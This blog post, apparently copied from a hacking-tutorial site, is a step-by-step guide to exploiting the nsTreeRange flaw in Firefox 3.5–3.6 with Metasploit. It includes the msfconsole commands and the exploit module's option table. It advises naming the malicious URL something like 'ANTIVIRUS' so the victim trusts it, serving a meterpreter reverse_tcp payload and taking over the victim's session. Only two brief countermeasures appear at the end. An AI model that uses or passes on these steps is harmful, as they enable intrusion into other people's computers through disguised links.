Linux menu

Wednesday, December 24, 2014

Hacking Mozilla Firefox 3.5 to 3.6 nsTreeRange Vulnerability Using Metasploit

Today while surfing I read some news about nsTreeRange Mozilla Firefox version 3.5 to 3.6.1.6 Vulnerability. Actually this vulnerbility ranking is not excellent or good, but it’s normal vulnerability. This vulnerability was known at 2011-07-10 by sinn3r. In this tutorial I’m using Windows 7 for my victim Operating system with Mozilla Firefox v 3.5.17. If you also want to try out this tutorial, you can find Mozilla Firefox version which I describe above at oldapps.com.

Requirements :

2. Linux OS or Backtrack 5(Metasploit already included inside this distro)

Step By Step :

1. The first step, just go to your msfconsole, and then use exploit/windows/browser/mozilla_nstreerange. If it returns cannot find exploit, maybe you should update your msf framework first by running msfupdate.
msf > use exploit/windows/browser/mozilla_nstreerange 
msf exploit(mozilla_nstreerange) > show options

Module options (exploit/windows/browser/mozilla_nstreerange):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CreateThread  true             yes       Whether to execute the payload in a new thread
   SEHProlog     true             yes       Whether to prepend the payload with an SEH prolog, to catch crashes and enable a silent exit
   SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL for incoming connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion    SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                        no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Auto (Direct attack against Windows XP, otherwise through Java, if enabled)
2. There’s a few option you should set up first before launching this exploit.
SRVHOST : Your IP address acts as exploit server
SRVPORT : port use to serve request from victim. The default value is 8080 but if your port 80 was free, it’s better to use port 80.
URIPATH : It’s something looks like http://www.hacking-tutorial.com/URIPATH, you can change this value to make URIPATH more readable by human e.g : http://www.hacking-tutorial.com/ANTIVIRUS, etc.
Hacking Mozilla Firefox nstreerange vulnerability tutorial
In above picture I’m also using meterpreter reverse_tcp payload. but you can choose the most suitable payload for you :-)
3. Everything was set up correctly, then run exploit to run our malicious webserver.
Hacking Mozilla Firefox nstreerange vulnerability tutorial
4. After the victim opened our malicious URL we’ve already send to them, our server processing and create new notepad.exe process at victim computer. Below is the screenshot.
Hacking Mozilla Firefox nstreerange vulnerability tutorial
5. A new session ID 1 has created, the next step we can interract with that session ID to gain privilege on victim computer.
sessions -l 1
Hacking Mozilla Firefox nstreerange vulnerability tutorial
That’s it we’re already inside victim computer:-)

Countermeasure :

– Always update your Mozilla Firefox into lastest version.
– Use personal firewall to detect inbound and outbound traffic.
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-mozilla-firefox-3-5-to-3-6-nstreerange-vulnerability-using-metasploit/#sthash.ZjCvAkQG.dpuf

No comments: